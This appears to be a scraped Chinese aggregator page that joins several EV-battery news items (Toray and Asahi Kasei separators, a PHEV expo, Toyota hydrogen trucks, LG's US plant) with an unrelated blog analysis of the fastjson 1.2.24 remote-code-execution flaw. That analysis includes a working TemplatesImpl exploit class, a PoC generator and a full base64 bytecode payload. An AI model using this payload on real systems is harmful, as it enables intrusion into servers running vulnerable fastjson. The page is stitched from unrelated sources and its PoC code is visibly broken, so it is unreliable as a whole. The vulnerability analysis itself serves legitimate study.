日經新聞、日刊工業新聞1日報導，Toray計畫在2020年結束前總計砸下約1,200億日圓擴增車用鋰離子電池關鍵材料「分隔膜（separator、見附圖）」產能，目標將分隔膜年產能擴增至19.5億平方公尺、將達現行（約4億平方公尺）的約5倍。Toray目前在日本及南韓生產分隔膜，且已在南韓工廠進行增產工程，計畫在2017年度末（2018年3月底）將分隔膜年產能提高至約6.5億平方公尺。

報導指出，因法國、英國紛紛表明計畫在2040年停售汽柴油車，提振電動車（EV）有望急速普及，故Toray計畫在2019年於歐洲興建一座年產能達8,000萬平方公尺的新工廠，且除了歐洲之外，Toray也計畫在特斯拉（Tesla）等EV廠抬頭的美國興建新工廠。

特斯拉平價電動車「Model 3」於7月28日正式交車。而為了因應特斯拉增產所需，住友金屬礦山（Sumitomo Metal Mining）於7月28日宣布，將追加增產鋰離子電池正極材料「鎳酸鋰」，目標將其月產能擴增至現行的2.5倍。

鋰離子電池4大關鍵材料分別為正極材、負極材、分隔膜和電解液，而這些電池材料皆由日系廠商握有高市佔率，其中，在全球分隔膜市場上，Toray為第2大廠、僅次於旭化成（Asahi Kasei）。

日刊工業新聞6月23日報導，因車廠加快電動車（EV）的研發腳步、帶動電池材料市場成長速度超乎預期，故旭化成計畫上修鋰離子電池關鍵材料「分隔膜」的增產計畫，目標在2020年結束前將分隔膜年產能最高擴增至15億平方公尺（m2）、將達現行的2.5倍，且將遠高於原先規劃的11億m2目標，期望藉由積極投資、鞏固全球龍頭位置。預估追加擴產所需的投資額約300億日圓。

旭化成於3月30日宣布，因電動車（EV）、油電混合車（HV）等車用鋰離子電池需求預估將呈現急速增長，故決議擴增鋰離子電池關鍵材料「分隔膜」產能，計畫投下約150億日圓，在守山製造所（滋賀縣守山市）增設年產能約2億平方公尺（m2）的分隔膜產線，並預計於2019年度上半年商轉。旭化成指出，待上述增產工程完工後，該公司整體分隔膜年產能將從現行的約6.6億m2提高3成至約8.6億m2。

根據日本市調機構富士經濟（Fuji Keizai）預估，2020年全球分隔膜市場規模將增至3,000億日圓、將達2015年的2倍水準，而EV、HV等車用用途是推動分隔膜需求急增的最大功臣，預估2020年車用分隔膜佔整體市場比重將達約45%。

富士經濟6月22日公布調查報告指出，預估2030年時EV年銷售量將增至407萬台、超越HV（2030年銷售量預估為391萬台），且之後雙方的差距將持續擴大。富士經濟預估，在中國需求增加加持下，2035年EV全球銷售量將擴大至630萬台、將達2016年的13.4倍（較2016年增加12.4倍）。

（本文內容由授權使用。圖片出處：）

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計、台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨，RWD網頁設計已成為網頁設計推薦首選

由充電設施線上網、廣東省充電設施協會、廣東省新能源汽車產業協會和振威展覽股份聯合主辦，中國土木工程學會城市公共交通學會協辦的“2017上海國際新能源汽車產業博覽會”將於8月23-25日在上海新國際博覽中心隆重舉行，500多家企業將展出各類新能源汽車、電池、電機、電控和充電設施相關產品。其中，上汽、吉利等大牌車企將攜多款PHEV代表性車型亮相。

PHEV（混合動力汽車）因其高續航里程、有較強的節油減排能力，並且可獲得國家財政補貼而受廣大人民群眾的喜歡。據公開資料顯示，2016年，我國共銷售PHEV80352輛，2017年上半年銷售33000輛。雖然PHEV的產銷量並沒有純電動汽車可觀，但是這並不代表PHEV沒有發展潛力。

 

日前，為了推動我國新能源汽車發展的長效機制，促進新能源汽車的研發和推廣，加強汽車產品節能減排的管理，工信部發佈了《乘用車企業平均燃料消耗量與新能源積分並行管理辦法》（以下簡稱雙積分辦法）。雙積分辦法中對PHEV的積分形式有了明確的規定，也就是說，車企想要獲得積分，不僅僅是純電動汽車這一條路，PHEV同樣能達到積分的目的。另一方面，發展PHEV車型，還可以給消費者提供更多的車型選擇以迎合中國汽車市場消費者需求。

 

此外，插電式混合動力產品對於我國現有汽車車型結構優化，同時對汽車節能將發揮重大意義，利於我國汽車工業的節能減排。同時，混合動力車型對於實現油耗目標值具有較強可行性，尤其是節油效率達40~60%的PHEV車型。因此，在當前政策法規環境下，PHEV車型既能擴大新能源汽車產品結構比例，又能提升單車的節油率，某種意義上，發展PHEV車型是必然。

 

本屆展會上，上汽集團旗下榮威品牌將攜eRX5、ei6和e950等三款PHEV車型亮相。eRX5為一款SUV車型，綜合工況純電續駛里程60KM，油電合計續航里程達650KM，此款車型榮獲DESIGN AWARD2017設計大獎；ei6為一款轎車型，補貼後售價為16.58萬元，綜合工況純電續航里程53KM，油電合計續航里程達705KM；e950綜合工況油耗1.7L/100KM，綜合工況純電續駛里程60KM，油電合計續航里程超過600KM。

 

 

此外，吉利將攜帝豪PHEV亮相本次展會。此次展示是帝豪PHEV進入上海新能源汽車目錄後首度亮上海。帝豪PHEV在中控部分增加了旋鈕式檔位，使車輛可在純電動、混合動力等模式中進行切換，增強了操作的便利性及駕駛體驗。該款車型綜合工況純電續駛里程為61KM，油電合計續駛里程達705公里。

 

 

儘管國內堅持發展新能源車須以純電驅動為主要戰略取向，PHEV車型的發展不受《關於完善汽車投資項目管理的意見》重視，但是車企仍需要抓住這兩年的黃金發展時間，堅持開源，多生產插電式混合動力車型。既要滿足企業所面對的雙積分政策，同時解決市場對新能源汽車續駛里程的高期望，補貼減少對新能源汽車產業產生的負面效應等痛點。因此，本次展會的舉辦對於新能源汽車混合動力產品具有積極的展示作用。促進各界人士對PHEV產品的認識及瞭解。

 

參觀預登記，請點擊：http://www.zhenweiexpo.com/visitors/evse/

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計、台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨，RWD網頁設計已成為網頁設計推薦首選

日本汽車大廠豐田近年漸主打氫燃料電池車市場，自2014 年底推出首款燃料電池汽車Mirai 後，2016 年再推氫燃料大巴士Toyota FC Bus，並預計在2020 年的東京奧運會期間出售100 輛，用於接送選手往返賽地。現在，豐田再找上當地連鎖便利商店龍頭7-11 合作，嘗試為冷藏物流車輛搭載氫燃料電池，為節能減碳目標貢獻一己之力。

7-11 和豐田汽車在8 月9 日簽署了二氧化碳減排基本協議，7-11 將引進豐田以氫氣開發的冷藏物流新車輛和發電系統，其中製冷／冷凍機組及車輛本身都可由氫燃料電池供電。此外，他們還將引入可充電的汽車電池，發生自然災害之際可成為應急電源，比如停電時可做為避難場所的電力來源。

氫燃料電池在消耗過程中只會產生水，不會產生任何溫室氣體，但與使用可充電鋰離子電池做為動力來源不同，氫燃料電池車是靠著氫分子和氧分子的化學反應產生電流，再將電力送到鋰電池組和馬達驅動車輛前進。

2020 年東京奧運會期間出售的氫燃料巴士每台約100 萬美元，一台巴士備有600 公升的氫氣、一對電動馬達，提供200 公里續航力，總功率為306 匹馬力和494 磅英尺（670 牛頓米），僅需10 分鐘就能將氫氣加滿。

同時，豐田也在美國加州進行氫燃料電池供電的半掛卡車研究。不過，美國目前仍缺乏加氫站等基礎設施建設，除加州外，燃料電池車想要在全美進行銷售幾乎不可能，而整個加州也僅有不到20 個加氫站，許多站點還會因為維修問題關閉數週。

此外，氫氣並不是可從自然界中直接抓取的氣體，目前主要透過電解水或甲烷製氫兩種方式取得，唯電解水生成氫氣的能源轉化率約25% 左右，而甲烷製氫的代價是產生一氧化碳，並沒有比較划算。

不過， 豐田北美燃料電池開發項目經理Giorgio Zoia 胸有成竹地說，豐田的氫燃料電池將可以為重型運輸帶來革新風貌。目前已有廠商嘗試用太陽能發電來電解水，Zoia 表示，加州的太陽能農場在白天產生過多的電，加州電網有超載危機，如果這些多餘的太陽能發電被拿來做為電解水供電，並將產生的氫氣送到洛杉磯供電，則氫基工業基礎設施將開始成形。

（合作媒體：。圖片出處：Toyota）

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計、台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨，RWD網頁設計已成為網頁設計推薦首選

中國北京理工大學電動車輛國家工程實驗室、中國電工技術學會電動車輛專業委員會委員孫立清17日於第六屆中國鋰電新能源產業生態大會接受中證網專訪時表示，固態電池將是下一個「風口」，這主要因此類電池將使電動汽車充電時間短，續航里程長，而這正是新能源電池未來主要發展趨勢。

孫立清認為，未來新能源汽車電池領域將會呈現多元化發展，多種材料電池共生共存，而矽碳電池發展空間較大，因其原材料取之不盡。

孫立清還指出，新能源汽車頻繁的事故說明了新能源汽車還有非常大的改進空間，新能源汽車發展任重道遠，未來企業需要在提升品質、增加效率、確保安全、促進產量方面下功夫。其中，增加效率方面，需要達成輕量化、高效動力系統、能量再生回饋；在確保安全方面，要確保整車安全、電池組成組安全、高壓控制安全；促進產量方面，則可從新型製造技術、自動化管理、裝備三方面著手。

（本文內容由授權使用）

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計、台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨，RWD網頁設計已成為網頁設計推薦首選

看好電動車前景，LG電子23日宣布斥資2,500萬美元，要在美國興建電動車零件廠房。

The Investor、ET News報導，LG廠房將座落在底特律郊區Hazel Park，預定2018年初完工，一開始將為電動車供應電池組，未來還會提供更多關鍵零組件。

LG指出，去年美國的電動車合併銷售量為104,178台，跟中國（電動車銷售量為257,929台）、歐洲（108,649台）並列全球前三大電動車市場。

LG估計，至2020年為止，美國電動車市場每年平均可望成長65.5%。

這座廠房除了將供應通用汽車（GM）的電動車「Bolt」之外，也不排除向福特（Ford）、飛雅特克萊斯勒汽車（Fiat Chrysler Automobiles, FCA）爭取電動車零件訂單。

Electrek，福斯汽車（Volkswagen）研發部主管Ulrich Eichhorn 6月底就曾預估，業界需要多達40座規模跟特斯拉Gigafactory類似的超大電池廠，才能滿足電動車需求，假如新建礦場、工廠無法如期上線，那麼市場恐陷入短缺。

根據Eichhorn的估計，到了2025年，光是福斯集團就需要用到200 GWh的車用電池，至於其他汽車製造商，屆時也會有25%的產能屬於電動車。他是以Gigafactory的年產能可達35 GWh進行推估。

（本文內容由授權使用。圖片出處：public domain CC0）

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計、台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨，RWD網頁設計已成為網頁設計推薦首選

環境搭建：

漏洞影響版本：

fastjson在1.2.24以及之前版本存在遠程代碼執行高危安全漏洞

環境地址：

正常訪問頁面返回hello,world~

 

此時抓包修改content-type為json格式，並post payload，即可執行rce

 此時就能夠創建success文件

前置知識：

研究這個漏洞之前，先熟悉一下阿里的這個fastjson庫的基本用法

package main.java;

import java.util.HashMap;
import java.util.Map;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.serializer.SerializerFeature;
import main.java.user;
public class test_fast_json {


    public static  void  main(String[] args){
        Map<String,Object> map = new HashMap<String, Object>();
        map.put("key1","one");
        map.put("key2","two");
        //System.out.println(map.getClass());
        String mapjson = JSON.toJSONString(map);
        System.out.println(mapjson.getClass());
        user user1 = new user ();
        user1.setName("111");
        System.out.println(JSON.toJSONString(user1));

        String serializedStr1 = JSON.toJSONString(user1,SerializerFeature.WriteClassName);
        System.out.println("serializedStr1="+serializedStr1);
        user user2=(user)JSON.parse(serializedStr1);
        System.out.println(user2.getName());

        Object obj = JSON.parseObject(serializedStr1);
        System.out.println(obj);
        System.out.println(obj.getClass());

        Object obj1 = JSON.parseObject(serializedStr1,Object.class);
        //user obj1 = (user) JSON.parseObject(serializedStr1,Object.class);
        user obj2 = (user)obj1;
        System.out.println(obj2.getName());
        System.out.println(obj2.getClass());

    }


}

//輸出
class java.lang.String
{"age":0,"name":"111"}
serializedStr1={"@type":"main.java.user","age":0,"name":"111"}
111
{"name":"111","age":0}
class com.alibaba.fastjson.JSONObject
111
class main.java.user

這裏user為定義好的一個類，實際上fastjson提供給我們的也就是將對象快速轉換為可以傳輸的字符串，當然也提供從字符串中恢復出對象，也就是一個序列化和反序列化的過程，

可以從輸出看到，JSON.toJSONstring實際上是將類的屬性值轉化為字符串，當JSON.toJSONstring帶有writeclassname時此時字符串中將包含類名稱及其包名稱，所以此時可以定位到某個類以及其實例化對象的屬性值，再通過JSON.parse()函數即可通過fastjson序列化后的字符串恢復該類的對象，當恢復對象時，使用JSON.parseObject帶有Object.class時，此時能夠成功恢復出類的對象，否則只能恢復到JsonObject對象

漏洞分析：

這個漏洞利用方式有好種，這篇文章主要分析利用templatesImlp這個類，這個類中有一個_bytecodes字段，部分函數能夠根據這個字段來生成類的實例，那麼這個類的構造函數是我們可控的，就能夠rce

 test.java

package person;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Test extends AbstractTranslet {
    public Test() throws IOException {
        Runtime.getRuntime().exec("calc");
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }

    @Override
    public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException {

    }
   
}

test.java在這裏的話主要是用戶parseObject json反序列化時所要還原的類，因為在這會實例化該類，因此直接在其構造方法中calc即可

poc.java

package person;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.apache.commons.io.IOUtils;
import org.apache.commons.codec.binary.Base64;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;


public class Poc {

    public static String readClass(String cls){
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos); //將test.class字節碼文件轉存到字節數粗輸出流中
        } catch (IOException e) {
            e.printStackTrace();
        }
        return Base64.encodeBase64String(bos.toByteArray()); 

    }

    public static void  test_autoTypeDeny() throws Exception {
        ParserConfig config = new ParserConfig();
        final String fileSeparator = System.getProperty("file.separator");
        final String evilClassPath = System.getProperty("user.dir") + "\\target\\classes\\person\\Test.class";
        String evilCode = readClass(evilClassPath);
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; //autotype時反序列化的類
        String text1 = "{\"@type\":\"" + NASTY_CLASS +
                "\",\"_bytecodes\":[\""+evilCode+"\"]," +    //將evilcode放在_bytecodes處
                "'_name':'a.b'," +
                "'_tfactory':{ }," +
                "\"_outputProperties\":{ }}\n";
        System.out.println(text1);
        //String personStr = "{'name':"+text1+",'age':19}";
        //Person obj = JSON.parseObject(personStr, Person.class, config, Feature.SupportNonPublicField);
        Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField); //pareseObject來反序列化，此時要設置SupportNonPublicField

public static void main(String args[]){ try { test_autoTypeDeny(); } catch (Exception e) { e.printStackTrace(); } } }

 我們已經知道在反序列化解析json字符串時在parseobject時觸發

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADEALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQANTHBlcnNvbi9UZXN0OwEACkV4Y2VwdGlvbnMHACUBAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHACYBAApTb3VyY2VGaWxlAQAJVGVzdC5qYXZhDAAHAAgHACcMACgAKQEABGNhbGMMACoAKwEAC3BlcnNvbi9UZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAADwAEABAADQARAAsAAAAMAAEAAAAOAAwADQAAAA4AAAAEAAEADwABABAAEQABAAkAAABJAAAABAAAAAGxAAAAAgAKAAAABgABAAAAFQALAAAAKgAEAAAAAQAMAA0AAAAAAAEAEgATAAEAAAABABQAFQACAAAAAQAWABcAAwABABAAGAACAAkAAAA/AAAAAwAAAAGxAAAAAgAKAAAABgABAAAAGgALAAAAIAADAAAAAQAMAA0AAAAAAAEAEgATAAEAAAABABkAGgACAA4AAAAEAAEAGwABABwAAAACAB0="],'_name':'a.b','_tfactory':{ },"_outputProperties":{ }}

 在此下斷點，運行poc.java

此時首先調用com/alibaba/fastjson/JSON.java的parseObject函數來處理我們傳入的payload

 此時判斷我們傳入的features是否為null，這裏

我們已經制定了支持非publicfield屬性，因為使用的_bytescode實際為非public的，否則無法反序列化，接着調用defaultJsonParser來進一步處理payload

 此時進一步調用javaObjectDeserializer，也就是反序列化時所使用的反序列化引擎，繼續跟進

 此時在javaObjectDeserializer的deserialze函數中將判斷type的類型是不是泛型數組類型的實例以及判斷type是不是類類型的實例,這裏兩處不滿足，所以調用parse.parse來解析

實際上此時又回到了

並且在此調用parseObject函數來處理我們的payload

接下來一部分就是語法解析，先匹配出了其中的雙引號”，

 比如先在parseObject函數中匹配出了@type

 匹配出@type標誌以後，將會繼續向後掃描json字符串，即取匹配相應的值，這個值也就是我們想要反序列化的類

 繼續往下走，將調用deserializer.deserialze函數來處理反序列化數據，此時deserializer中已經包含了要實例化的templatesimpl類，

跟進此函數，則可以看到此時token為16並且text為我們的payload

 接下來會調用parseField函數來對json字符串中的一些key值進行匹配

 這個方法裏面會調用smartmatch來對key值進行一些處理，比如將_bytecodes的下劃線刪除

 當處理到_outputProperties字段時，步入其smartMatch方法

 此時在FieldDeserializer中將會調用setValue方，此時將會在其中調用getOutputProperties()方法，因為存在OutputProperties屬性

 

 此時在TemplatesImpl類的getOutputProperties函數中將會調用newTransformer().getOutputProperties函數，在newTransformer函數中又調用了getTransletInstance()函數，

 

 這裏首先判斷_name字段不能為空，這也是為啥payload裏面會設置一個_name字段

 接下來就會調用newInstance()函數來實例化對象了，可以看到此事要求實例化的對象時AbstractTranslet類的，那麼只需要讓我們的payload中的類繼承自該類即可， 

可以看到此時_transletIndex為零，因此此時實例化的就是我們構造的惡意類，

 

縮減后的整個調用鏈即為：

JSON.parseObject
...
JavaBeanDeserializer.deserialze
...
FieldDeserializer.setValue
...
TemplatesImpl.getOutputProperties
TemplatesImpl.newTransformer
TemplatesImpl.getTransletInstance
...
Runtime.getRuntime().exec

參考：

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※USB CONNECTOR掌控什麼技術要點? 帶您認識其相關發展及效能

※評比前十大台北網頁設計、台北網站設計公司知名案例作品心得分享

※智慧手機時代的來臨，RWD網頁設計已成為網頁設計推薦首選